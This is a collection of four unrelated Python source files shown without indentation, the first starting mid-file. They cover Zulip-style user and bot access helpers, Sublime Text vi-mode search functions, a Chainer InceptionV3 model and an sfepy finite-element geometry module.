return user_profiles
def access_bot_by_id(user_profile: UserProfile, user_id: int) -> UserProfile:
try:
target = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
except UserProfile.DoesNotExist:
raise JsonableError(_("No such bot"))
if not target.is_bot:
raise JsonableError(_("No such bot"))
if not user_profile.can_admin_user(target):
raise JsonableError(_("Insufficient permission"))
return target
def access_user_by_id(user_profile: UserProfile, user_id: int,
allow_deactivated: bool=False, allow_bots: bool=False) -> UserProfile:
try:
target = get_user_profile_by_id_in_realm(user_id, user_profile.realm)
except UserProfile.DoesNotExist:
raise JsonableError(_("No such user"))
if target.is_bot and not allow_bots:
raise JsonableError(_("No such user"))
if not target.is_active and not allow_deactivated:
raise JsonableError(_("User is deactivated"))
if not user_profile.can_admin_user(target):
raise JsonableError(_("Insufficient permission"))
return target
def get_accounts_for_email(email: str) -> List[Dict[str, Optional[str]]]:
profiles = UserProfile.objects.select_related('realm').filter(delivery_email__iexact=email.strip(),
is_active=True,
realm__deactivated=False,
is_bot=False).order_by('date_joined')
return [{"realm_name": profile.realm.name,
"string_id": profile.realm.string_id,
"full_name": profile.full_name,
"avatar": avatar_url(profile)}
for profile in profiles]
def get_api_key(user_profile: UserProfile) -> str:
return user_profile.api_key
def get_all_api_keys(user_profile: UserProfile) -> List[str]:
# Users can only have one API key for now
return [user_profile.api_key]
def validate_user_custom_profile_data(realm_id: int,
profile_data: List[Dict[str, Union[int, str, List[int]]]]) -> None:
# This function validate all custom field values according to their field type.
for item in profile_data:
field_id = item['id']
try:
field = CustomProfileField.objects.get(id=field_id)
except CustomProfileField.DoesNotExist:
raise JsonableError(_('Field id {id} not found.').format(id=field_id))
validators = CustomProfileField.FIELD_VALIDATORS
field_type = field.field_type
var_name = '{}'.format(field.name)
value = item['value']
if field_type in validators:
validator = validators[field_type]
result = validator(var_name, value)
elif field_type == CustomProfileField.CHOICE:
choice_field_validator = CustomProfileField.CHOICE_FIELD_VALIDATORS[field_type]
field_data = field.field_data
result = choice_field_validator(var_name, field_data, value)
elif field_type == CustomProfileField.USER:
user_field_validator = CustomProfileField.USER_FIELD_VALIDATORS[field_type]
result = user_field_validator(realm_id, cast(List[int], value),
False)
else:
raise AssertionError("Invalid field type")
if result is not None:
raise JsonableError(result)
| |
import sublime
import sublime_plugin
import re
def find_in_range(view, term, start, end, flags=0):
found = view.find(term, start, flags)
if found and found.b <= end:
return found
def find_all_in_range(view, term, start, end, flags=0):
matches = []
while True:
m = find_in_range(view, term, start, end, flags)
if m == sublime.Region(-1, -1):
return matches
if not m:
return matches
if m.end() > end or m.begin() < start:
return matches
matches.append(m)
start = m.end()
def find_wrapping(view, term, start, end, flags=0, times=1):
current_sel = view.sel()[0]
# Search wrapping around the end of the buffer.
for x in range(times):
match = find_in_range(view, term, start, end, flags)
# Start searching in the upper half of the buffer if we aren't doing it yet.
if not match and start > current_sel.b:
start = 0
end = current_sel.a
match = find_in_range(view, term, start, end, flags)
if not match:
return
# No luck in the whole buffer.
elif not match:
return
start = match.b
return match
def reverse_find_wrapping(view, term, start, end, flags=0, times=1):
current_sel = view.sel()[0]
# Search wrapping around the end of the buffer.
for x in range(times):
match = reverse_search(view, term, start, end, flags)
# Start searching in the lower half of the buffer if we aren't doing it yet.
if not match and start <= current_sel.b:
start = current_sel.b
end = view.size()
match = reverse_search(view, term, start, end, flags)
if not match:
return
# No luck in the whole buffer.
elif not match:
return
end = match.a
return match
def find_last_in_range(view, term, start, end, flags=0):
found = find_in_range(view, term, start, end, flags)
last_found = found
while found:
found = find_in_range(view, term, found.b, end, flags)
if not found or found.b > end:
break
last_found = found if found else last_found
return last_found
# reverse search
def reverse_search(view, term, start, end, flags=0):
assert isinstance(start, int) or start is None
assert isinstance(end, int) or end is None
start = start if (start is not None) else 0
end = end if (end is not None) else view.size()
if start < 0 or end > view.size():
return None
lo_line = view.full_line(start)
hi_line = view.full_line(end)
while True:
low_row, hi_row = view.rowcol(lo_line.a)[0], view.rowcol(hi_line.a)[0]
middle_row = (low_row + hi_row) // 2
middle_line = view.full_line(view.text_point(middle_row, 0))
lo_region = sublime.Region(lo_line.a, middle_line.b)
hi_region = sublime.Region(middle_line.b, min(hi_line.b, end))
if find_in_range(view, term, hi_region.a, hi_region.b, flags):
lo_line = view.full_line(middle_line.b)
elif find_in_range(view, term, lo_region.a, lo_region.b, flags):
hi_line = view.full_line(middle_line.a)
else:
return None
if lo_line == hi_line:
# we found the line we were looking for, now extract the match.
return find_last_in_range(view, term, hi_line.a, min(hi_line.b, end), flags)
def reverse_search_by_pt(view, term, start, end, flags=0):
assert isinstance(start, int) or start is None
assert isinstance(end, int) or end is None
start = start if (start is not None) else 0
end = end if (end is not None) else view.size()
if start < 0 or end > view.size():
return None
lo_line = view.full_line(start)
hi_line = view.full_line(end)
while True:
low_row, hi_row = view.rowcol(lo_line.a)[0], view.rowcol(hi_line.a)[0]
middle_row = (low_row + hi_row) // 2
middle_line = view.full_line(view.text_point(middle_row, 0))
lo_region = sublime.Region(lo_line.a, middle_line.b)
hi_region = sublime.Region(middle_line.b, min(hi_line.b, end))
if find_in_range(view, term, hi_region.a, hi_region.b, flags):
lo_line = view.full_line(middle_line.b)
elif find_in_range(view, term, lo_region.a, lo_region.b, flags):
hi_line = view.full_line(middle_line.a)
else:
return None
if lo_line == hi_line:
# we found the line we were looking for, now extract the match.
return find_last_in_range(view, term, max(hi_line.a, start), min(hi_line.b, end), flags)
# TODO: Test me.
class BufferSearchBase(sublime_plugin.TextCommand):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def calculate_flags(self):
# TODO: Implement smartcase?
flags = 0
if self.view.settings().get('vintageous_magic') == False:
flags |= sublime.LITERAL
if self.view.settings().get('vintageous_ignorecase') == True:
flags |= sublime.IGNORECASE
return flags
def build_pattern(self, query):
return query
def hilite(self, query):
flags = self.calculate_flags()
regs = self.view.find_all(self.build_pattern(query), flags)
if not regs:
self.view.erase_regions('vi_search')
return
# TODO: Re-enable this.
# if State(self.view).settings.vi['hlsearch'] == False:
# return
self.view.add_regions('vi_search', regs, 'comment', '',
sublime.DRAW_NO_FILL)
# TODO: Test me.
class ExactWordBufferSearchBase(BufferSearchBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def calculate_flags(self):
if self.view.settings().get('vintageous_ignorecase') == True:
return sublime.IGNORECASE
return 0
def get_query(self):
# TODO: make sure we swallow any leading white space.
query = self.view.substr(self.view.word(self.view.sel()[0].end()))
return query
def build_pattern(self, query):
return r'\b{0}\b'.format(re.escape(query))
| |
from chainer.functions.array import concat
from chainer.functions.loss import softmax_cross_entropy as S
from chainer.functions.noise import dropout
from chainer.functions.pooling import average_pooling_2d as A
from chainer.functions.pooling import max_pooling_2d as M
from chainer import link
from chainer.links.connection import convolution_2d as C
from chainer.links.connection import linear
from chainer.links.normalization import batch_normalization as B
class AuxConv(link.Chain):
def __init__(self, conv, batch_norm=True, pool=None):
super(AuxConv, self).__init__(conv=conv)
if batch_norm:
out_channel = conv.W.data.shape[0]
self.add_link('batch_norm',
B.BatchNormalization(out_channel))
self.pool = pool
def __call__(self, x, train=True):
if self.pool:
x = self.pool(x)
x = self.conv(x)
if self.batch_norm:
x = self.batch_norm(x, test=not train)
return x
class Sequential(link.ChainList):
def __call__(self, x, *args, **kwargs):
for l in self:
x = l(x, *args, **kwargs)
return x
class Inception(link.ChainList):
def __init__(self, *links, **kw):
super(Inception, self).__init__(*links)
self.pool = kw.get('pool', None)
def __call__(self, x, train=True):
xs = [l(x, train) for l in self]
if self.pool:
xs.append(self.pool(x))
return concat.concat(xs)
class InceptionV3(link.Chain):
"""Inception V3.
http://arxiv.org/abs/1512.00567
https://github.com/tensorflow/models/blob/master/inception/inception/slim/inception_model.py
"""
def __init__(self, use_cudnn=True):
convolution = link.ChainList(
AuxConv(C.Convolution2D(3, 32, 3, 2, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(32, 32, 3, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(32, 64, 3, 1, 1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(64, 80, 3, 1, 1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(80, 192, 3, use_cudnn=use_cudnn)))
def inception_0(input_channel, pool_channel):
# 1x1
s1 = AuxConv(C.Convolution2D(input_channel, 64, 1, use_cudnn=use_cudnn))
# 5x5
s21 = AuxConv(C.Convolution2D(input_channel, 48, 1, use_cudnn=use_cudnn))
s22 = AuxConv(C.Convolution2D(48, 64, 5, pad=2, use_cudnn=use_cudnn))
s2 = Sequential(s21, s22)
# double 3x3
s31 = AuxConv(C.Convolution2D(input_channel, 64, 1, use_cudnn=use_cudnn))
s32 = AuxConv(C.Convolution2D(64, 96, 3, pad=1, use_cudnn=use_cudnn))
s33 = AuxConv(C.Convolution2D(96, 96, 3, pad=1, use_cudnn=use_cudnn))
s3 = Sequential(s31, s32, s33)
# pool
s4 = AuxConv(C.Convolution2D(input_channel,
pool_channel, 3, pad=1, use_cudnn=use_cudnn),
pool=M.MaxPooling2D(3, 1, 1, use_cudnn=use_cudnn))
return Inception(s1, s2, s3, s4)
inception0 = Sequential(*[inception_0(input_channel, pool_channel)
for input_channel, pool_channel
in zip([192, 256, 288], [32, 64, 64])])
grid_reduction0 = Inception(
# strided 3x3
AuxConv(C.Convolution2D(288, 384, 3, 2, use_cudnn=use_cudnn)),
# double 3x3
Sequential(
AuxConv(C.Convolution2D(288, 64, 1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(64, 96, 3, pad=1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(96, 96, 3, 2, use_cudnn=use_cudnn))),
# pool
pool=M.MaxPooling2D(3, 2))
def inception_1(hidden_channel):
# 1x1
s1 = AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn))
# 7x7
s21 = AuxConv(C.Convolution2D(768, hidden_channel, 1, use_cudnn=use_cudnn))
s22 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
s23 = AuxConv(C.Convolution2D(hidden_channel, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
s2 = Sequential(s21, s22, s23)
# double 7x7
s31 = AuxConv(C.Convolution2D(768, hidden_channel, 1, use_cudnn=use_cudnn))
s32 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
s33 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
s34 = AuxConv(C.Convolution2D(hidden_channel, hidden_channel, (1, 7), pad=(0, 3), use_cudnn=use_cudnn))
s35 = AuxConv(C.Convolution2D(hidden_channel, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn))
s3 = Sequential(s31, s32, s33, s34, s35)
# pool
s4 = AuxConv(C.Convolution2D(768, 192, 3, pad=1, use_cudnn=use_cudnn),
pool=A.AveragePooling2D(3, 1, 1, use_cudnn=use_cudnn))
return Inception(s1, s2, s3, s4)
inception1 = Sequential(*[inception_1(c)
for c in [128, 160, 160, 192]])
grid_reduction1 = Inception(
# strided 3x3
Sequential(
AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(192, 320, 3, 2, use_cudnn=use_cudnn))),
# 7x7 and 3x3
Sequential(
AuxConv(C.Convolution2D(768, 192, 1, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(192, 192, (1, 7), pad=(0, 3), use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(192, 192, (7, 1), pad=(3, 0), use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(192, 192, 3, 2, use_cudnn=use_cudnn))),
# pool
pool=M.MaxPooling2D(3, 2, use_cudnn=use_cudnn))
def inception_2(input_channel):
# 1x1
s1 = AuxConv(C.Convolution2D(input_channel, 320, 1, use_cudnn=use_cudnn))
# 3x3
s21 = AuxConv(C.Convolution2D(input_channel, 384, 1, use_cudnn=use_cudnn))
s22 = Inception(AuxConv(C.Convolution2D(384, 384, (1, 3),
pad=(0, 1), use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(384, 384, (3, 1),
pad=(1, 0), use_cudnn=use_cudnn)))
s2 = Sequential(s21, s22)
# double 3x3
s31 = AuxConv(C.Convolution2D(input_channel, 448, 1, use_cudnn=use_cudnn))
s32 = AuxConv(C.Convolution2D(448, 384, 3, pad=1, use_cudnn=use_cudnn))
s331 = AuxConv(C.Convolution2D(384, 384, (1, 3), pad=(0, 1), use_cudnn=use_cudnn))
s332 = AuxConv(C.Convolution2D(384, 384, (3, 1), pad=(1, 0), use_cudnn=use_cudnn))
s33 = Inception(s331, s332)
s3 = Sequential(s31, s32, s33)
# pool
s4 = AuxConv(C.Convolution2D(input_channel, 192, 3, pad=1, use_cudnn=use_cudnn),
pool=A.AveragePooling2D(3, 1, 1, use_cudnn=use_cudnn))
return Inception(s1, s2, s3, s4)
inception2 = Sequential(*[inception_2(input_channel)
for input_channel in [1280, 2048]])
auxiliary_convolution = Sequential(
AuxConv(C.Convolution2D(768, 128, 1, use_cudnn=use_cudnn),
pool=A.AveragePooling2D(5, 3, use_cudnn=use_cudnn)),
AuxConv(C.Convolution2D(128, 768, 5, use_cudnn=use_cudnn)))
super(InceptionV3, self).__init__(
convolution=convolution,
inception=link.ChainList(inception0, inception1, inception2),
grid_reduction=link.ChainList(grid_reduction0, grid_reduction1),
auxiliary_convolution=auxiliary_convolution,
auxiliary_linear=linear.Linear(768, 1000),
linear=linear.Linear(2048, 1000))
def __call__(self, x, train=True):
"""Computes the output of the module.
Args:
x(~chainer.Variable): Input variable.
"""
def convolution(x, train):
x = self.convolution[0](x)
x = self.convolution[1](x)
x = self.convolution[2](x)
x = M.max_pooling_2d(x, 3, 2)
x = self.convolution[3](x)
x = self.convolution[4](x)
x = M.max_pooling_2d(x, 3, 2)
return x
# Original paper and TensorFlow implementation has different
# auxiliary classifier. We implement latter one.
def auxiliary_classifier(x, train):
x = self.auxiliary_convolution(x, train)
return self.auxiliary_linear(x)
def classifier(x, train):
x = A.average_pooling_2d(x, 8)
x = dropout.dropout(x, train=train)
x = self.linear(x)
return x
x = convolution(x, train)
assert x.data.shape[1:] == (192, 35, 35),\
'actual={}'.format(x.data.shape[1:])
x = self.inception[0](x, train)
assert x.data.shape[1:] == (288, 35, 35),\
'actual={}'.format(x.data.shape[1:])
x = self.grid_reduction[0](x, train)
assert x.data.shape[1:] == (768, 17, 17),\
'actual={}'.format(x.data.shape[1:])
x = self.inception[1](x, train)
assert x.data.shape[1:] == (768, 17, 17),\
'actual={}'.format(x.data.shape[1:])
y_aux = auxiliary_classifier(x, train)
x = self.grid_reduction[1](x, train)
assert x.data.shape[1:] == (1280, 8, 8),\
'actual={}'.format(x.data.shape[1:])
x = self.inception[2](x, train)
assert x.data.shape[1:] == (2048, 8, 8),\
'actual={}'.format(x.data.shape[1:])
y = classifier(x, train)
self.y = y
self.y_aux = y_aux
return y, y_aux
class InceptionV3Classifier(link.Chain):
def __init__(self, predictor):
super(InceptionV3Classifier, self).__init__(predictor=predictor)
def __call__(self, *args):
assert len(args) >= 2
x = args[:-1]
t = args[-1]
self.y, self.y_aux = self.predictor(*x)
self.loss = S.softmax_cross_entropy(self.y, t)
self.loss += S.softmax_cross_entropy(self.y_aux, t)
return self.loss
| |
"""
GeometryElement describes the geometric entities of a finite element mesh.
Notes
-----
* geometry_data: surface facets are assumed to be of the same kind for
each geometry element - wedges or pyramides are not supported.
* the orientation is a tuple:
(root1, vertices of direction vectors, swap from, swap to, root2, ...)
"""
from sfepy.base.base import *
geometry_data = {
'1_2' : Struct(coors = [[0.0],
[1.0]],
faces = None,
edges = None,
volume = 1.0,
orientation = None,
surface_facet_name = None),
'2_3' : Struct(coors = [[0.0, 0.0],
[1.0, 0.0],
[0.0, 1.0]],
faces = None,
edges = [[0, 1],
[1, 2],
[2, 0]],
volume = 0.5,
orientation = (0, (1, 2), 1, 2),
surface_facet_name = '1_2'),
'2_4' : Struct(coors = [[0.0, 0.0],
[1.0, 0.0],
[1.0, 1.0],
[0.0, 1.0]],
faces = None,
edges = [[0, 1],
[1, 2],
[2, 3],
[3, 0]],
volume = 1.0,
# Not finished...
orientation = (0, (1, 3), (0, 1), (3, 2)),
surface_facet_name = '1_2'),
'3_4' : Struct(coors = [[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]],
faces = [[0, 2, 1],
[0, 3, 2],
[0, 1, 3],
[1, 2, 3]],
edges = [[0, 1],
[1, 2],
[2, 0],
[0, 3],
[1, 3],
[2, 3]],
volume = 1.0 / 6.0,
orientation = (0, (1, 2, 3), 0, 3),
surface_facet_name = '2_3'),
'3_8' : Struct(coors = [[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[1.0, 1.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0],
[1.0, 0.0, 1.0],
[1.0, 1.0, 1.0],
[0.0, 1.0, 1.0]],
faces = [[0, 3, 2, 1],
[0, 4, 7, 3],
[0, 1, 5, 4],
[4, 5, 6, 7],
[1, 2, 6, 5],
[2, 3, 7, 6]],
edges = [[0, 1],
[1, 2],
[2, 3],
[3, 0],
[4, 5],
[5, 6],
[6, 7],
[7, 4],
[0, 4],
[1, 5],
[2, 6],
[3, 7]],
volume = 1.0,
# Not finished...
orientation = (0, (1, 3, 4), (0, 1, 2, 3), (4, 5, 6, 7) ),
surface_facet_name = '2_4'),
}
def setup_orientation(vecs_tuple):
cycle = range(len(vecs_tuple) / 4)
roots = nm.array([vecs_tuple[4*ii] for ii in cycle], dtype=nm.int32)
vecs = nm.array([vecs_tuple[4*ii+1] for ii in cycle],
dtype=nm.int32, ndmin=2)
swap_from = nm.array([vecs_tuple[4*ii+2] for ii in cycle],
dtype=nm.int32, ndmin=2)
swap_to = nm.array([vecs_tuple[4*ii+3] for ii in cycle],
dtype=nm.int32, ndmin=2)
return roots, vecs, swap_from, swap_to
class GeometryElement(Struct):
"""
The geometric entities of a finite element mesh.
"""
def __init__(self, name):
"""
Parameters
----------
name : str
The name of the entity, one of the keys in geometry_data
dictionary.
"""
self.name = name
gd = geometry_data[name]
self.coors = nm.array(gd.coors, dtype=nm.float64)
self.n_vertex, self.dim = self.coors.shape
self.is_simplex = self.n_vertex == (self.dim + 1)
self.vertices = nm.arange(self.n_vertex, dtype=nm.int32)
if gd.edges is not None:
self.edges = nm.array(gd.edges, dtype=nm.int32)
self.n_edge = self.edges.shape[0]
else:
self.edges = gd.edges
self.n_edge = 0
if gd.faces is not None:
self.faces = nm.array(gd.faces, dtype=nm.int32)
self.n_face = self.faces.shape[0]
else:
self.faces = gd.faces
self.n_face = 0
if gd.orientation is not None:
aux = setup_orientation(gd.orientation)
self.orientation = Struct(name='orientation',
roots=aux[0], vecs=aux[1],
swap_from=aux[2], swap_to=aux[3])
else:
self.orientation = None
self.surface_facet_name = gd.surface_facet_name
self.surface_facet = None
def get_interpolation_name(self):
"""
Get the name of corresponding linear interpolant.
"""
if self.is_simplex:
suffix = '_P1'
else:
suffix = '_Q1'
return self.name + suffix
def get_surface_entities(self):
"""
Return self.vertices in 1D, self.edges in 2D and self.faces in 3D.
"""
if self.dim == 1:
return self.vertices
elif self.dim == 2:
return self.edges
else:
assert_(self.dim == 3)
return self.faces
def get_edges_per_face(self):
"""
Return the indices into self.edges per face.
"""
if self.dim == 3:
# Assign edges to a face (in order).
indx = {3: [[0, 1], [1, 2], [2, 0]],
4: [[0, 1], [1, 2], [2, 3], [3, 0]]}
epf = []
se = [set(edge) for edge in self.edges]
iis = indx[self.surface_facet.n_vertex]
for face in self.faces:
aux = []
for ii in iis:
edge = set(face[ii])
ie = se.index(edge)
aux.append(ie)
epf.append(aux)
else:
epf = nm.arange(self.edges.shape[0])[:,nm.newaxis]
return nm.array(epf, dtype=nm.int32)
def create_surface_facet(self):
"""
Create a GeometryElement instance corresponding to this instance
surface facet.
"""
self.surface_facet = GeometryElement(self.surface_facet_name)
def orient_edges(self, edges):
"""
Return the edge orientation flag.
"""
return nm.where(edges[:,0] < edges[:,1], 0, 1)
def orient_faces3(self, faces):
pass
def orient_faces4(self, faces):
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.